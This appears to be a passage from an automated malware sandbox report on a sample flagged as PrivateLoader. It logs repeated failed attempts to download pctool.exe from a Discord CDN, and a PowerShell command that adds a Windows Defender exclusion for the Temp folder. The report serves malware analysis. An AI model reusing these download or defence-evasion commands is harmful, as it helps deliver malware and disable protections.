                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FpogMS1K8ZhkmzVoLG%2B3jYHXMI5ZYSydnHNl%2BejyDsGBIjQFwoB5BvnDDOhe7eCmqSc%2B1aAfQ%2Bl%2FC8wiNvEazgKvyJCQkO%2Bk9%2FVEjL6b%2FtbuPHqP6aabqCsJci1JL7j2Lj3Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Y2mY8.hNfMdokEOoDj0iuWUQlwnHpgixwfmDZcVKAIU-1724230801895-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e2fc9605e79-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:01 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      34 | 192.168.2.4 | 60075 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:07 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:07 UTC | 1055 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:07 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=Vlp40VoFFmoxXiL8KGE3_ZeH2T4US26PN79VEjWhP_I-1724230807-1.0.1.1-u7phVtUQvOv_bTuAMKCUAObQJMbhT3DtVW6WpzTimYvxhWWThNpHG0R9L1ZU7sK4bBGs5OahIXyoHzLaLFNjVQ; path=/; expires=Wed, 21-Aug-24 09:30:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMUgkTX5ul2TrLML%2B%2F%2B43X32525q9ZQArTtcZLbGRLr08euEy7q7zNdOmmCZk0gDG2o%2Fixqz2N0IeuKG%2FR2jWPWEvUNYahq8qSSW6RMPvab%2FvMnLe06rr9Mnasd1%2B1dpk0ppTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=3ltFfUXMdUm_VTaq5ylUa3l99E4g3qYSbYl0_zZcY5o-1724230807530-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e52fe3543fe-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:07 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      35 | 192.168.2.4 | 60080 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:13 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:00:13 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:13 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=1oDfCiJh2IGy5_ByXZSTqDKoCPo2aGVmZl_YaSDhUg8-1724230813-1.0.1.1-5mcLTNdpOUS.h28t.cuX4NrPugUmTgKNRngQ6nDu0MF2ikAa61SFtB7._OuYNWI1557.m5mOXrhIOs2m40abAA; path=/; expires=Wed, 21-Aug-24 09:30:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dP3KrWc3rNULTb%2B4TJ3upXZEIAhLgKpT2fX7DBYB6CiGvqkS%2Flsu0JGHjqSOxq8msQ%2BA9nRmrz6AeuApMf7LElhrJGS%2Fw1HnN0LxypeR8kGApApZmRAbtgmzeerkQveSt8P9qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Ow_u9KO6VJrFgWdqZtkgRYAmxPrDHk3C5.qxnTAqu80-1724230813156-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e7618ce1821-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:13 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      36 | 192.168.2.4 | 60083 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:18 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:18 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:18 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=vquBfoat0ti8JBRtc2UJDfRrfrFJ_RQq_QmFVBiPXdQ-1724230818-1.0.1.1-ihHMcvoSY3gkQqiaktsrUAwPtSBIqyOved6qF9HWcDEHTOHdIJcvjAMw4s0DOG83iBKeMWyBjKgihrhxGMVvMw; path=/; expires=Wed, 21-Aug-24 09:30:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pnpi%2FLX0fbM4s2AyhAT0U2TW9JW4bSLt3UMJDhopWjgS0dj9EHHelwEyzF9yW7EZEXYKlb9zzrvAYxsDmd0KJOnKOVcxqWwJaCQzdgRqfDdjvfECxVfoCvBd8kwwBzcQSSyygw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=JPBHsANHK21PFW6Acd66B23lW83gpH3t5LvwdRLMOAY-1724230818814-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696e998dcd1906-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:18 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      37 | 192.168.2.4 | 60087 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:24 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:24 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:24 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=DUlwbPlsV._tPzPtxXTXxjl3uUFCpqQ6ZMase4QvG30-1724230824-1.0.1.1-dwMee_HmryBstTOjBO6d1iHgWGDZbI3_ClcLoKg5p_wyTAgyktA5Qq__EShRqlJxwjgVoTdlcfozpF6LxbKmtw; path=/; expires=Wed, 21-Aug-24 09:30:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQRLgUm1QoK%2F1HvfdaLzTTXgOWaDky9AaK5My2J5K1UgnddD5tVfEyiKsrZ3eX77HQSN%2FOxAA8IgurNG%2FdFybvqvPJyIOmaVDGF1P0yI67uoFA6%2BmIBx6RSg54tN%2FbEcHLZD2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=P5J4py93aGuJf2iVPIBUq7jLgDyGN._b3ye68lBsHwo-1724230824409-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696ebc7bde5e74-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:24 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      38 | 192.168.2.4 | 60092 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:29 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:00:30 UTC | 1053 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:30 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=xYgYULbsG3tyKJByRJxxNsnnGNm9EkxlSyc5YLuBQ68-1724230830-1.0.1.1-Sx1NQNE0xZ2szSNFOnRXb1ghDtAD6MYRjCdBPg.qJ0G6Rl3mtYlrhtWbgyI.nxx2Ou6FyhY4szFAqi_PShlmbA; path=/; expires=Wed, 21-Aug-24 09:30:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3NSi%2BuZFkocpech5P2sU7dTOg6obM7a3CZ%2Bk2FHEabn9ACGEyEmfA%2BOublDfwwsGyiaFZbwqJUZwJyXj9MOTwg%2FN0x3RlBaUuHdDfgrh%2Bf80CukkoUFmkSeSkPCO2arGr%2FVcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=DwYx9gQl5y0SE_Pp6M30Mg7isTI85M56GwwPVmX0kjw-1724230830049-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696edfb904426d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:30 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      39 | 192.168.2.4 | 60096 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:35 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:35 UTC | 1041 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:35 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=gpcZ2YLCYhCVYKwNMOsyC1cDx2Cm7SmZP6sLAkgL4GY-1724230835-1.0.1.1-v8oAKQ.8gnbRzmu70mkw6aXZaJvh1i.kyEy1DmlgLadqmROA2Enok1Df51JCTb1jeNQG5nmTp7gugIC6HqR_.w; path=/; expires=Wed, 21-Aug-24 09:30:35 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9atcKiCru3a9Vu2yNTHddZA0vYztIvdNjQyVOFdOSmowUYklsDcODMCWdR6PSimiI2hiLSGFYx24cAZIH8tPLUTnDaABavOs2o8DsAmXKqaYb4bWflN7pLIi51h6UFNy4Rkvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Si5eXBO9Nadt0DBd2XxLIKh5JF6xeOJJa_I1aWjpypI-1724230835705-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f031de94304-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:35 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      40 | 192.168.2.4 | 60100 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:41 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:41 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:41 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=CG2bMzkwFhzo_6W5zDhheua_EGuaOJe92elWCzkdJ7U-1724230841-1.0.1.1-ZKTjsN3pMRE.Iuyxe9APXiV.pZvzxOe8Fd6y6eIFfcISZd9uKltep5pGtCoHldMc1ZVE_Xa4aztuGNctbG2KkQ; path=/; expires=Wed, 21-Aug-24 09:30:41 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFgtSjlnOS%2FletsIhKkOOfv942q9%2BSKOv5UBXQUL7dZOBKYWN90PIP9%2FMIUCjz3fLi8AOuGkRKC9lIbkdp3xHKK29YQrXGeOtyyWcaKwTIgW2oEf3lzcwkQxDIr4%2Fw%2FG11kC8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=4.fEzU4NP3qPT67aKbxzdo9khcXBKp5geySeef9sOzA-1724230841350-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f265a601971-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:41 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      41 | 192.168.2.4 | 60104 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:47 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 09:00:47 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:47 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ryhG8PrW2GoqettBiFQJoUr1.UAq9UIrv2sa1sis4eU-1724230847-1.0.1.1-rQ0jACcnVALW3kY9Dn9PdYHy2pVswGdOJ.1wnJAS41QrTW8CoyiULmLtB90_rNGNoEA97cgTm76x.KUwAi2h9Q; path=/; expires=Wed, 21-Aug-24 09:30:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfk1s4rnAVdavSZEQgSvlRiFi9I9tTaahZVrbIQAgOl%2Fe3CJBMLPYg4nWCnvwfT2n8FyNJwAjiWvcIaruaWoWP06yUsiBk29A%2FhSDs0wbto0GJ3yLqWg3%2FNV3rdZ%2Fs21l8cAZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=uxUy69UtfTGgc_w3guur9ZGxSDrlJY0eiLq0bX9hFiM-1724230847131-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f4a7ed37292-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 09:00:47 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      42 | 192.168.2.4 | 60108 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 09:00:52 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 09:00:52 UTC | 1043 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:52 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=nkUBmIBtxze4Ei2AYFyKtFZYwfCS9uHdCpJT1I11QWg-1724230852-1.0.1.1-DuQqOCTrKAGVK5GA3QCvkdor8QGv03DvT1pL.k5vTnnT14a8KQrXAur6CwkSjInS0e9p5skkNd3FWLB818eXNQ; path=/; expires=Wed, 21-Aug-24 09:30:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9K3VOPZsMXZ9y4Za9KPzV7go3MxZ24piwL9DXEilTNB6JBS8%2F6CGW8U3NlQmwE4QA1VQQi1RI209N6NbqNFNrLgdyIF14vPkZcGlJ1fiaI40na4gaYgdzn5v5WnJvRgtSfbAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=NoM7KgtlJXSIOluf.rpbowjI0XHoHepIeAUSdyGsi88-1724230852783-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f6dda02c35f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      Timestamp: 2024-08-21 09:00:52 UTC  Bytes transferred: 36  Direction: IN  Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID: 43  Source IP: 192.168.2.4  Source Port: 60112  Destination IP: 162.159.130.233  Destination Port: 443  PID: 7972  Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp: 2024-08-21 09:00:58 UTC  Bytes transferred: 104  Direction: OUT  Data: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Timestamp: 2024-08-21 09:00:58 UTC  Bytes transferred: 1053  Direction: IN  Data: HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:00:58 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ZYThuz8gU4Zjf8bttJRbbZ66RSbATbPjyH27xidCT6s-1724230858-1.0.1.1-vbfA_wmpp9QGlNswZmGk3p3f27MLEjPzJ9.LzgZhJa0nWIDFeuv6uul7SZQe04pVdtG2BgLBV83XQ8axMPgkXA; path=/; expires=Wed, 21-Aug-24 09:30:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPAZjCZKp1HxtZ9xciX%2B8fE%2F7xz5v%2B5nLZyQ7UKXVl7LsgO4dHPkTYbIXE2sFRu99hu4bepM3viw%2BJW8%2FfqntC6JWw1ztFlh0PHARghQLEBE0gkETH5d%2FxyCNGGPcLTUSU41og%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=TAdansgSXPEGma0KpPyPjPeyk_2zoSlOqI0w2mmFEXg-1724230858423-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696f911e4e43a6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      Timestamp: 2024-08-21 09:00:58 UTC  Bytes transferred: 36  Direction: IN  Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID: 44  Source IP: 192.168.2.4  Source Port: 60117  Destination IP: 162.159.133.233  Destination Port: 443  PID: 7972  Process: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp: 2024-08-21 09:01:04 UTC  Bytes transferred: 128  Direction: OUT  Data: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      Timestamp: 2024-08-21 09:01:04 UTC  Bytes transferred: 1055  Direction: IN  Data: HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 09:01:04 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=QE8sXrft4O235HQa2l0sHP7XbF3mMirvFzhwqy9UYBI-1724230864-1.0.1.1-fqGuNa7aYkVO0oLFCATi7wnSkwKvyKFHvO6GYaAAjeBBnpCqk40xvQnaLeOu_eHSBHZkgaGb9_TDCCg3LqpWNw; path=/; expires=Wed, 21-Aug-24 09:31:04 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WptpOnAp5y63yFrvDHjn6DW7Qu7%2BsmIs%2BatK502qbb33%2FAoNB1ZCO3EcB8TQ6L8K%2FduH9XbYhCO1YSyJynZF3gZIbOj9y%2FypDhypKWPd%2FSwK%2BeoJ6r5Hr3z0SM12MADis44rOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=3.FDysOfRq8HCNmLtnF4lfo84o7BtaNJya51IP6dQgQ-1724230864112-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696fb4aece19d7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      Timestamp: 2024-08-21 09:01:04 UTC  Bytes transferred: 36  Direction: IN  Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Target ID:0
                                      Start time:04:57:00
                                      Start date:21/08/2024
                                      Path:C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"
                                      Imagebase:0x400000
                                      File size:3'545'603 bytes
                                      MD5 hash:EFA310FFCB46AA3768DE9AAE3A8FDCDA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:04:57:00
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\setup_installer.exe"
                                      Imagebase:0x400000
                                      File size:3'527'334 bytes
                                      MD5 hash:264FBE02A8ACAE2BA9A5144F8B947AAE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_DLInjector03, Description: Detects unknown loader / injector, Source: 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 68%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:04:57:02
                                      Start date:21/08/2024
                                      Path:C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe"
                                      Imagebase:0x400000
                                      File size:2'249'157 bytes
                                      MD5 hash:33D05F6171D18F49EDD9C5B1BC5B8C72
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 68%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:04:57:02
                                      Start date:21/08/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:04:57:03
                                      Start date:21/08/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
